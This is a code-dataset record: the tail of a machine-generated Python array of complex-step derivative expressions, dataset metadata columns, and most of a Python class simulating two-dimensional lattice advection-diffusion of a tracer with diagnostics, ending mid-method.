yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_s*(1.0e-50*1j + p11_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s)/1e-50),
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_n*p13_s*v*sin(theta_n*theta_s) - p11_n*p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_s*(1.0e-50*1j + p12_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)*(p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_s*(1.0e-50*1j + p12_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s)/1e-50),
(tf)*(-np.imag(lamP11_N*(Dt*sigv**2*cos(theta_n*theta_s)**2 - 2*p13_s*v*(1.0e-50*1j + p13_n)*sin(theta_n*theta_s) - p11_n*p11_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s + lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_s*v*(1.0e-50*1j + p13_n)*sin(theta_n*theta_s) + p13_s*v*(1.0e-50*1j + p13_n)*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_s*v*(1.0e-50*1j + p13_n)*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamP33_N*(Dt*sigw**2 - p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)*(p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(1.0e-50*1j + p13_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(1.0e-50*1j + p13_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s)/1e-50),
(tf)*(-np.imag(lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s)/1e-50),
(tf)*(-np.imag(lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_s*(1.0e-50*1j + p23_n)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_s*v*(1.0e-50*1j + p23_n)*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_s*(1.0e-50*1j + p23_n)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamP33_N*(Dt*sigw**2 - p13_n*p13_s*(x_n*x_s - xb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_s*(1.0e-50*1j + p23_n)*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s)/1e-50),
(tf)*(-np.imag(lamP13_N*(-p33_s*v*(1.0e-50*1j + p33_n)*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP23_N*(p33_s*v*(1.0e-50*1j + p33_n)*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s)/1e-50),
tf*0,
])
print(gx)
tock = toc()
print('N:' + str(tock))
print(fx-gx)
| 536.10989
| 8,342
| 0.557189
| 14,188
| 48,786
| 1.584367
| 0.005145
| 0.073046
| 0.094889
| 0.12634
| 0.97838
| 0.978113
| 0.97531
| 0.974065
| 0.96797
| 0.961208
| 0
| 0.1152
| 0.115504
| 48,786
| 91
| 8,343
| 536.10989
| 0.405738
| 0
| 0
| 0.131579
| 0
| 0
| 0.000082
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.039474
| 0
| 0.039474
| 0.065789
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
acf1c9e4c794a4dd6785333797b6b383d4e6c632
| 23,891
|
py
|
Python
|
experiments/lattice_model.py
|
crocha700/pylattice
|
54c13735fecee121ffea8048f0f37d9b196f8e54
|
[
"MIT"
] | null | null | null |
experiments/lattice_model.py
|
crocha700/pylattice
|
54c13735fecee121ffea8048f0f37d9b196f8e54
|
[
"MIT"
] | null | null | null |
experiments/lattice_model.py
|
crocha700/pylattice
|
54c13735fecee121ffea8048f0f37d9b196f8e54
|
[
"MIT"
] | null | null | null |
from __future__ import division
import numpy as np
from numpy import pi, cos, sin, exp
class LatticeModel():
""" A class that represents a two-dimensional lattice
model of advection-diffusion with large-scale
sinusoidal source """
def __init__(self,
nx=128,
ny=None,
Lx=2*pi,
Ly=None,
dt=0.5,
tmax=1000,
tavestart = 500,
kappa=1.e-5,
urms = 1.,
power = 3.5,
nmin = 5.,
nmax = None,
source=True,
diagnostics_list='all'):
if ny is None: ny = nx
if Ly is None: Ly = Lx
self.nx = nx
self.ny = ny
self.Lx = Lx
self.Ly = Ly
self.dt = dt
self.dt_2 = dt/2.
self.dt_4 = dt/4.
self.tmax = tmax
self.tavestart = tavestart
self.t = 0.
self.tc = 0
self.kappa = kappa
self.nmin = nmin
if nmax:
self.nmax = nmax
else:
self.nmax = nx
self.power = power
self.urms = urms
self.source=source
self.diagnostics_list = diagnostics_list
self._initialize_grid()
self._init_velocity()
self._initialize_diagnostics()
self.even = True
self.odd = False
def _initialize_grid(self):
""" Initialize lattice and spectral space grid """
# physical space grids
self.dx, self.dy = self.Lx/(self.nx), self.Ly/(self.ny)
self.x = np.linspace(0.,self.Lx-self.dx,self.nx)
self.y = np.linspace(0.,self.Ly-self.dy,self.ny)
self.xi, self.yi = np.meshgrid(self.x,self.y)
self.ix, self.iy = np.meshgrid(range(self.nx),
range(self.ny))
# wavenumber grids
self.dk = 2.*pi/self.Lx
self.dl = 2.*pi/self.Ly
self.nl = self.ny
self.nk = self.nx/2+1
self.ll = self.dl*np.append( np.arange(0.,self.nx/2),
np.arange(-self.nx/2,0.) )
self.kk = self.dk*np.arange(0.,self.nk)
self.k, self.l = np.meshgrid(self.kk, self.ll)
self.ik = 1j*self.k
self.il = 1j*self.l
# constant for spectral normalizations
self.M = self.nx*self.ny
self.M2 = self.M**2
self.wv2 = self.k**2 + self.l**2
self.wv = np.sqrt( self.wv2 )
def _velocity(self):
phase = 2*pi*np.random.rand(2,self.nmax-self.nmin)
phi, psi = phase[0], phase[1]
Yn = self.n*self.y[...,np.newaxis] + phase[0][np.newaxis,...]
Xn = self.n*self.x[...,np.newaxis] + phase[1][np.newaxis,...]
u = (self.An*cos(Yn*self.dl)).sum(axis=1)
v = (self.An*cos(Xn*self.dk)).sum(axis=1)
self.u = u[...,np.newaxis]
self.v = v[np.newaxis,...]
def _init_velocity(self):
self.n = np.arange(self.nmin,self.nmax)[np.newaxis,...]
An = (self.n/self.nmin)**(-self.power/2.)
N = 2*self.urms/( np.sqrt( ((self.n/self.nmin)**-self.power).sum() ) )
self.An = N*An
#self.An = np.sqrt(2.)
#self.An = 2*urms
# estimate the Batchelor scale
S = np.sqrt( ((self.An*self.n*self.dk)**2).sum()/2. )
self.lb = np.sqrt(self.kappa/S)
#assert self.lb > self.dx, "**Warning: Batchelor scale not resolved."
def _advect(self,direction='x',n=1):
""" Advect th on a lattice given u and v,
and the current index array ix, iy
n is the number of substeps
n=1 for doing the full advection-diffusion,
n=2 for doing half the advection, etc """
if direction == 'x':
ix_new = self.ix.copy()
dindx = -np.round(self.u*self.dt_2/n/self.dx).astype(int)
ix_new = self.ix + dindx
ix_new[ix_new<0] = ix_new[ix_new<0] + self.nx
ix_new[ix_new>self.nx-1] = ix_new[ix_new>self.nx-1] - self.nx
self.th = self.th[self.iy,ix_new]
elif direction == 'y':
iy_new = self.iy.copy()
dindy = -np.round(self.v*self.dt_2/n/self.dy).astype(int)
iy_new = self.iy + dindy
iy_new[iy_new<0] = iy_new[iy_new<0] + self.ny
iy_new[iy_new>self.ny-1] = iy_new[iy_new>self.ny-1] - self.ny
self.th = self.th[iy_new,self.ix]
# advection + source
#y = self.y[...,np.newaxis] + np.zeros(self.x.size)[np.newaxis,...]
#v = self.v + np.zeros(self.y.size)[...,np.newaxis]
#sy = np.sin(self.dl*y)
#syn = np.sin(self.dl*(y+v*self.dt_2/n))
#v = np.ma.masked_array(v, v == 0.)
#self.forcey = (sy[iy_new,self.ix]-sy)/(self.dl*v)
#self.forcey = (syn-sy)/(self.dl*v)
#self.forcey[v.mask] = (self.dt_2/n)*np.cos(self.dl*y[v.mask])
#self.th = self.th[iy_new,self.ix] + self.forcey
def _diffuse(self, n=1):
""" Diffusion """
self.thh = np.fft.rfft2(self.th)
self.thh = self.thh*exp(-(self.dt/n)*self.kappa*self.wv2)
self.th = np.fft.irfft2(self.thh)
def _source(self,direction='x',n=1):
if direction == 'x':
self.th += (self.dt/n)*np.cos(self.dl*self.y)[...,np.newaxis]
elif direction == 'y':
# a brutal way
#self.th += (self.dt/n)*np.cos(self.dl*self.y)[...,np.newaxis]
pass
def _step_forward(self):
self._velocity()
# x-dir
self._advect(direction='x',n=2)
self._source(direction='x',n=2)
self._diffuse(n=4)
self._advect(direction='x',n=2)
self._source(direction='x',n=2)
self._diffuse(n=4)
# y-dir
self._advect(direction='y',n=2)
self._source(direction='y',n=2)
self._diffuse(n=4)
self._advect(direction='y',n=2)
self._source(direction='y',n=2)
self._diffuse(n=4)
self._calc_diagnostics()
self.tc += 1
self.t += self.dt
def run_with_snapshots(self, tsnapstart=0., tsnap=1):
"""Run the model forward, yielding to user code at specified intervals.
"""
tsnapint = np.ceil(tsnap/self.dt)
while(self.t < self.tmax):
self._step_forward()
if self.t>=tsnapstart and (self.tc%tsnapint)==0:
yield self.t
return
def run(self):
"""Run the model forward without stopping until the end."""
while(self.t < self.tmax):
self._step_forward()
def _calc_diagnostics(self):
# here is where we calculate diagnostics
if (self.t>=self.dt) and (self.t>=self.tavestart):
self._increment_diagnostics()
# diagnostic stuff follow
def _initialize_diagnostics(self):
# Initialization for diagnotics
self.diagnostics = dict()
self._setup_diagnostics()
if self.diagnostics_list == 'all':
pass # by default, all diagnostics are active
elif self.diagnostics_list == 'none':
self.set_active_diagnostics([])
else:
self.set_active_diagnostics(self.diagnostics_list)
def _setup_diagnostics(self):
"""Diagnostics setup"""
self.add_diagnostic('var',
description='Tracer variance',
function= (lambda self: self.spec_var(self.thh))
)
self.add_diagnostic('thbar',
description='x-averaged tracer',
function= (lambda self: self.thm)
)
self.add_diagnostic('grad2_th_bar',
description='x-averaged gradient square of th',
function= (lambda self: self.gradth2m)
)
self.add_diagnostic('vth2m',
description='x-averaged triple advective term v th2',
function= (lambda self: self.vth2m)
)
self.add_diagnostic('th2m',
description='x-averaged th2',
function= (lambda self: self.th2m)
)
self.add_diagnostic('vthm',
description='x-averaged, y-direction tracer flux',
function= (lambda self: (self.v*self.tha).mean(axis=1))
)
self.add_diagnostic('fluxy',
description='x-averaged, y-direction tracer flux',
function= (lambda self: (self.v*self.th).mean(axis=1))
)
self.add_diagnostic('spec',
description='spec of anomalies about x-averaged flow',
function= (lambda self: np.abs(np.fft.rfft2(
self.th-self.th.mean(axis=1)[...,np.newaxis]))**2/self.M2)
)
def _set_active_diagnostics(self, diagnostics_list):
for d in self.diagnostics:
self.diagnostics[d]['active'] == (d in diagnostics_list)
def add_diagnostic(self, diag_name, description=None, units=None, function=None):
# create a new diagnostic dict and add it to the object array
# make sure the function is callable
assert hasattr(function, '__call__')
# make sure the name is valid
assert isinstance(diag_name, str)
# by default, diagnostic is active
self.diagnostics[diag_name] = {
'description': description,
'units': units,
'active': True,
'count': 0,
'function': function, }
def describe_diagnostics(self):
"""Print a human-readable summary of the available diagnostics."""
diag_names = self.diagnostics.keys()
diag_names.sort()
print('NAME | DESCRIPTION')
print(80*'-')
for k in diag_names:
d = self.diagnostics[k]
print('{:<10} | {:<54}').format(
*(k, d['description']))
def _increment_diagnostics(self):
# compute intermediate quantities needed for some diagnostics
self._calc_derived_fields()
for dname in self.diagnostics:
if self.diagnostics[dname]['active']:
res = self.diagnostics[dname]['function'](self)
if self.diagnostics[dname]['count']==0:
self.diagnostics[dname]['value'] = res
else:
self.diagnostics[dname]['value'] += res
self.diagnostics[dname]['count'] += 1
def _calc_derived_fields(self):
""" Calculate derived field necessary for diagnostics """
self.thh = np.fft.rfft2(self.th)
# x-averaged tracer field
self.thm = self.th.mean(axis=1)
#self.thmh = np.fft.rfft(self.thm)
#self.thm_y = np.fft.irfft(1j*self.kk*self.thmh)
# anomaly about the x-averaged field
self.tha = self.th-self.thm[...,np.newaxis]
self.thah = np.fft.rfft2(self.tha)
# x-averaged gradient squared
gradx = np.fft.irfft2(1j*self.k*self.thah)
grady = np.fft.irfft2(1j*self.l*self.thah)
self.gradth2m = (gradx**2 + grady**2).mean(axis=1)
# Osborn-Cox amplification factor
#self.thm_y = 4*np.sin(self.y*self.dl)
#thm_y = self.block_average(self.thm_y)
#gradth2m = self.block_average(self.gradth2m)
#self.A2_OC = gradth2m / thm_y**2
#self.A2_OC[thm_y < 1.e-14] = np.nan
# triple term
self.vth2m = (self.v*(self.tha**2)).mean(axis=1)
# diff transport
self.th2m = (self.tha**2).mean(axis=1)
def get_diagnostic(self, dname):
return (self.diagnostics[dname]['value'] /
self.diagnostics[dname]['count'])
def spec_var(self, ph):
""" compute variance of p from Fourier coefficients ph """
var_dens = 2. * np.abs(ph)**2 / self.M**2
# only half of coefs [0] and [nx/2+1] due to symmetry in real fft2
var_dens[...,0] = var_dens[...,0]/2.
var_dens[...,-1] = var_dens[...,-1]/2.
return var_dens.sum()
def block_average(self,A, nblocks = 256):
""" Block average A onto A blocks """
